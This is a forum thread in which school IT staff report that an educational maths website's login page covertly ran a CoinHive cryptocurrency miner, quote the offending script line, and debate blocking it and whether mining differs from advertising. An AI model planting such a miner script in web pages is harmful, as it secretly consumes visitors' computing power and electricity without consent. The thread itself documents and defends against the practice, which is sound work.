Popular Post skell Posted September 27, 2017 Popular Post Posted September 27, 2017 Apologies if this is the wrong forum - mods, please move if appropriate. Method Maths seem to be employing a crypto miner on at least their login page https://methodmaths.com/login.html Here is the view source view Method Maths <br /> html, body { text-align: centre; position: absolute; left: 50%; margin: 0px -488px; background-color: #ffffff;}<br /> body { margin:0; padding:0; overflow:hidden; }<br /> #flashContent { width:100%; height:100%; }<br /> [b]var miner = new CoinHive.User('ZaECyHVdxhESEaLIPlGpwLWQEUXC47NU', 'Method',{threads: 2,throttle: 0.5});miner.start(); [/b] methodMathsLogo.png methodMathsSpacer.png Puffin-Web-Browser-For-pc.png Clear as day. I've blocked the domain via SmoothWall but I don't know if that will be enough yet. 5
KibosJ Posted September 27, 2017 Posted September 27, 2017 (edited) Wow! I've blocked the domain here now, considered blocking MethodMaths altogether, but I'm sure that would have gone down really well. With the domain blocked, the script doesn't run here, so hopefully that is enough, but this is shocking behaviour! --EDIT--Just spoken to them and they have said they are going to remove it. Edited September 27, 2017 by KibosJ
skell Posted September 27, 2017 Author Posted September 27, 2017 I'm now considering deploying a Chrome extension which will stop this behaviour. No Coin looks OK but allows users to whitelist sites. I'd rather they didn't get a choice for this.
KibosJ Posted September 27, 2017 Posted September 27, 2017 I'm now considering deploying a Chrome extension which will stop this behaviour. No Coin looks OK but allows users to whitelist sites. I'd rather they didn't get a choice for this. Would be good to get an extension that doesn't allow configuration. I wonder if Smoothwall could add a Content Modification policy to stop this.
skell Posted September 27, 2017 Author Posted September 27, 2017 (edited) Looks like its gone from the login page for now. Edited September 27, 2017 by skell
pcstru Posted September 27, 2017 Posted September 27, 2017 This is being touted as an alternative to carrying adverts, so I suspect we will see more and more of it. I wonder if it is worth doing work to prevent it - it shouldn't get in the way of the user of the site (otherwise why would sites deploy it), so using a few more CPU cycles to visit the page - is that something that I should actually spend time/money to prevent?
skell Posted September 27, 2017 Author Posted September 27, 2017 A few points I'd like to make. - Schools pay for this site. It is not funded by ads. - What about schools who don't have fast CPUs? From what I can gather, it was set to use 2 threads and throttle to use 50% of the CPU. - Computers have a shelf life. The more you stress them, the quicker they fail.
KibosJ Posted September 27, 2017 Posted September 27, 2017 A few points I'd like to make. - Schools pay for this site. It is not funded by ads. - What about schools who don't have fast CPUs? From what I can gather, it was set to use 2 threads and throttle to use 50% of the CPU. - Computers have a shelf life. The more you stress them, the quicker they fail. The other thing too, they've added this without letting anyone know and it would take nothing at all to change this to using 100% of the CPU and as many threads as possible.
jthompson Posted September 27, 2017 Posted September 27, 2017 Yet another way for energy to be squandered. Ever since I heard that each Bitcoin transaction uses up about 8kWh (can't quite remember the source, or if that is indeed correct) I've come to view cryptocurrencies in general as unsustainable. Will be blocking that domain!
pcstru Posted September 27, 2017 Posted September 27, 2017 (edited) A few points I'd like to make. - Schools pay for this site. It is not funded by ads. Sure and they have removed it. My point is that this will (is already) being used by other sites and being touted as a way to generate income as an alternative to advertising. - What about schools who don't have fast CPUs? From what I can gather, it was set to use 2 threads and throttle to use 50% of the CPU. Well, however fast your CPU is, you will have 50% left - most of which is probably spent NOPing or in idle loops. So let's compare two situations : 1. You visit a site and up pops an Advert that you have to sit through for 1 minute and for the sake of argument, that uses 1 billion CPU cycles to render the video. Following that you take 1 minute to do what you went to the site to do. 2. You visit a site and you get straight to what you wanted to do, which you do in 2 minutes. In that two minutes, the site uses 1 billion CPU cycles mining Crypto tulips. It seems to me that both situations are just as bad. I didn't want adverts and nor did I want my machine used to mine Tulips. I don't see much difference between them from the point of view of the user or us as a provider of IT : people visit sites, code is run on the local machine (yea so much for all this 'cloud' stuff!). - Computers have a shelf life. The more you stress them, the quicker they fail. Are you saying using a CPU, even at 100% is stressing it? That seems to me to be substantially untrue. CPU's do not wear out and if use causes it to fail, it is likely a manufacturing defect during fabrication, not anything wearing out (in modern electronic circuits, capacitors are about the only component with any actual shelf life that we would be impacted by). Edited September 27, 2017 by pcstru Clarity
pcstru Posted September 27, 2017 Posted September 27, 2017 (edited) Yet another way for energy to be squandered. Ever since I heard that each Bitcoin transaction uses up about 8kWh (can't quite remember the source, or if that is indeed correct) I've come to view cryptocurrencies in general as unsustainable. Will be blocking that domain! Out by an order of magnitude and a bit, it is estimated at 208 KWh or enough to power 7.2 US households for a day (or a Bangladeshi household for a year). Tulips anyone? Edited September 27, 2017 by pcstru
Marci Posted September 27, 2017 Posted September 27, 2017 (edited) I wonder if it is worth doing work to prevent it - it shouldn't get in the way of the user of the site (otherwise why would sites deploy it), so using a few more CPU cycles to visit the page - is that something that I should actually spend time/money to prevent? Increased CPU load beyond established norms = increased energy consumption = increased utility bill for the school for no good reason (and likely unbudgeted for). Reminds me of the days when folks were getting sacked on a large scale for installing Folding at Home / SETi etc on work PCs without permission, except this is an external agent using up your electric rather than an employee. Most definitely out of order and one for the blacklist. It also can produce an increased thermal load if an entire class is using the site, and therefore has knock on effect on aircon running costs too. I doubt this practice will survive for long... Edited September 27, 2017 by Marci
FN-GM Posted September 27, 2017 Posted September 27, 2017 I wonder if it is the companies account or the developers personal account?
skell Posted September 27, 2017 Author Posted September 27, 2017 They look one and the same to me, judging by the mobile phone contact number.
pcstru Posted September 27, 2017 Posted September 27, 2017 Increased CPU load beyond established norms = increased energy consumption = increased utility bill for the school for no good reason (and likely unbudgeted for). Reminds me of the days when folks were getting sacked on a large scale for installing Folding at Home / SETi etc on work PCs without permission, except this is an external agent using up your electric rather than an employee. Most definitely out of order and one for the blacklist. It also can produce an increased thermal load if an entire class is using the site, and therefore has knock on effect on aircon running costs too. I've bolded what I might falg as "weasel words" "established norms" because that itself is an essential part of the question. What exactly constitutes normal use and when does use become abuse? Why is using CPU cycles to mine Digi-Tulips substantially different to using CPU cycles and bandwidth to render an advert? (An argument could be constructed that Bandwidth is more valuable than a few CPU cycles, so this is actually preferable ). I doubt this practice will survive for long... I'd probably bet against that. Making money is much too important to allow ethical or moral considerations to hold back the searing uber-heat of innovation. What a time to be alive!
FN-GM Posted September 27, 2017 Posted September 27, 2017 My big issue is if every site did this and you have a few tabs open they will gobble all of the CPU.
SchoolsBroadband Posted September 27, 2017 Posted September 27, 2017 I wonder how much money we'd make if we put this on all the blocked pages we served up from our filtering service Only joking of course we'd never do it but it'd be interesting to calculate just how much coin / money it'd make......
jthompson Posted September 27, 2017 Posted September 27, 2017 I wonder how much money we'd make if we put this on all the blocked pages we served up from our filtering service Only joking of course we'd never do it but it'd be interesting to calculate just how much coin / money it'd make...... Don't forget, you'd need to put a game or something in your block page to encourage those kids to keep the page open for a half hour or so each time.
pcstru Posted September 27, 2017 Posted September 27, 2017 A question for everyone : You visit a website you like. Instead of the page, it pops up a dialogue box which offers you the choice - a website that is AD and tracking free, but you have to allow it to run some code in the background, or the usual page which contains code which connects to any number of web servers to identify and track you in the background. Which do you choose and why? Personally, as long as the code itself is well behaved, I'd pick the miner every time. The problem IMO, is not really what the code is doing, it is the sneaky way it is being done. But that is already pervasive and embedded, it is just that the code it is not mining crypto-tulips, it is mining YOU for personal data and spamming you with advertising. A bit of tulip-mining seems quite simple and honest compared to all that.
Marci Posted September 27, 2017 Posted September 27, 2017 (edited) But we’re not talking ‘you’ in this context (or are we - what was the OPs intention). We’re talking a public sector body, in the case of the majority funded by public money. From a school perspective, any site I discovered doing this to whom we paid a subscription fee, which was approved based on a given known amount, with or without notice, would have to be passed up the chain to decide on the future use thereof as it WILL impact on budgets in the long-term forecast... how much depending on the use of the site in question. Any site doing this & not requiring a subscription fee, I’d be blocking at the filters for the same reason. It will result in an unplanned increase in expenditure. What I choose on my own personal equipment, attached to a power supply I pay the bill for - fair enough - End-user decision. For a publicly funded body? Different story entirely (imo). Are your students in a position to make the call between seeing ads or low-level crypto? They do not pay the bill for the electric at the end of the day... Edited September 27, 2017 by Marci 1
pcstru Posted September 27, 2017 Posted September 27, 2017 But we’re not talking ‘you’ in this context (or are we - what was the OPs intention). I was (hopefully politely) trying to expand to a more general context, but I'm happy to argue it within the context of a school on the premiss that we are talking about reasonably well behaved code. We’re talking a public sector body, in the case of the majority funded by public money. From a school perspective, any site I discovered doing this to whom we paid a subscription fee, which was approved based on a given known amount, with or without notice, would have to be passed up the chain to decide on the future use thereof as it WILL impact on budgets in the long-term forecast... how much depending on the use of the site in question. I do sort of agree. What is problematic is quite why. The fact is, we don't know what code is running on our browsers in the main. In the end, whatever it is, it is numbers being manipulated by code. Any site doing this & not requiring a subscription fee, I’d be blocking at the filters for the same reason. It will result in an unplanned increase in expenditure. Compared to what? I asked a couple of questions which compared unsolicited advertising and the processing involved in that, to mining tulips. The point of those questions was, it might be exactly the same expenditure. Are you measuring the impact of advertising and tracking code? Do you know what they are doing with device fingerprinting and behavioural tracking scripts? Why is drawing abstract mathematical pictures of tulips a problem and compared to that? When a student or teacher visits a site, if they get from that what they want and that content is not forbidden and the delivery neither impacts their experience or the experience of anyone else - why exactly does it matter? What I choose on my own personal equipment, attached to a power supply I pay the bill for - fair enough - End-user decision. For a publicly funded body? Different story entirely (imo). Are your students in a position to make the call between seeing ads or low-level crypto? They do not pay the bill for the electric at the end of the day... I'd say what we have to do is allow students to make use of the web. Do we get to choose that adverts and behavioural tracking code is preferable to rolling some dice to award token 'tulip' prizes. To me that seems a bizarre distinction (assuming reasonably well behaved code). IMO this will be a thing. You will have EduGCoin, fractions will be awarded to you personally for every moment your browser spends on the site. Blockchain is a way to certify genuine user appfacetime to marketing snouts. The tulips will bloom. What a time to be alive!
jthompson Posted September 28, 2017 Posted September 28, 2017 A question for everyone : You visit a website you like. Instead of the page, it pops up a dialogue box which offers you the choice - a website that is AD and tracking free, but you have to allow it to run some code in the background, or the usual page which contains code which connects to any number of web servers to identify and track you in the background. Which do you choose and why? Personally, as long as the code itself is well behaved, I'd pick the miner every time. The problem IMO, is not really what the code is doing, it is the sneaky way it is being done. But that is already pervasive and embedded, it is just that the code it is not mining crypto-tulips, it is mining YOU for personal data and spamming you with advertising. A bit of tulip-mining seems quite simple and honest compared to all that. I'm with you in that it's about being up front. In the case of me personally, I use ad and tracker blockers (I occasionally disable my ad blocker for sites which I'm keen to support). That's partly for privacy reasons, but it's mainly for performance and security reasons. On mobile, the performance difference is even more pronounced. The issue of blocking ads is a separate discussion in itself, but essentially, when it comes to mining scripts, I'd want to take up the same stance of blocking by default and opting in at my discretion. I also agree that it's going to become a lot more commonplace, which would entrench my position on it yet further.
3s-gtech Posted September 29, 2017 Posted September 29, 2017 Just noticed that Sophos AV is stopping the Javascript for this now when a user goes to it.
Ant Posted October 9, 2017 Posted October 9, 2017 Thought this was relevant: Websites hacked to mint crypto-cash - BBC News
Arthur Posted October 14, 2017 Posted October 14, 2017 This is being touted as an alternative to carrying adverts, so I suspect we will see more and more of it. Cryptocurrency mining affects over 500 million people. And they have no idea it is happening We found 220 sites that launch mining when a user opens their main page, with an aggregated audience of 500 million people. These people live all over the world; there are sites with users from the USA, China, South American and European countries, Russia, India, Iran… and the list goes on. 220 sites may not seem like a lot. But CoinHive was launched less than one month ago, on the 14th of September. How much money have these websites made? We estimate their joint profit at over US $43,000. Again, right now it’s not millions, but this money has been made in three weeks at almost zero cost.
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now